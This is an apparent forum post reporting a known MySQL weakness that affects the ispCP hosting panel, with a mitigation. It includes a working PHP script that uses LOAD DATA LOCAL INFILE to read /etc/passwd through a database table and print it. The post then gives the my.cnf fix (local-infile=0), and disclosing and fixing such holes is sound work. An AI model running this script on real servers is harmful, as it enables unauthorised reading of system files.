exploit

[sci2tech]

Well known, old, not generated by ispcp but affect it.

Code:

<?php
$link = mysql_connect('localhost', 'sqluser1', 'sqluser1');
mysql_select_db('bla');
mysql_query("CREATE TABLE a (a varchar(1024))");
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a");
$result = mysql_query("SELECT a FROM a");
while(list($row) = mysql_fetch_row($result))
print "$row\n";
mysql_query("DROP TABLE `a`");
?>

To get rid of this, you need to add in my.cnf in section [mysqld]

Quote:set-variable=local-infile=0

Maybe this should be implement as a security feature in ispcp